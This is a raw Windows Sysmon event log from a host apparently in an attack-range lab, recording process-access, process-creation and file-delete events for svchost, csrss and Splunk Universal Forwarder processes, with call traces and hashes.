11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1AAA-6216-6C05-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AAA-6216-6C05-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.691{4F8D34B0-1AAA-6216-6C05-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:46.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48EE7A9E24280E581BF212FB8DB3F5D0,SHA256=51AC7C1687819A409FA1BEC7867A8FD71D8ACD595B8134418C76E8FA2B8B58AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.691{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C23ED56AA21AA99FF2D37E1593344488,SHA256=E4A037F425B507068EEDB016146CA033FD263FD2836F488D850C01994328526A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6ABEE3AD8F8C824793D3859B0432705,SHA256=0F0DC942C1EE3B3C74748040CBA361A174EA3FD3E7415748FE74443CF0DC7545,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AAB-6216-6D05-000000003902}2384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1AAB-6216-6D05-000000003902}2384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.363{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AAB-6216-6D05-000000003902}2384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.364{4F8D34B0-1AAB-6216-6D05-000000003902}2384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 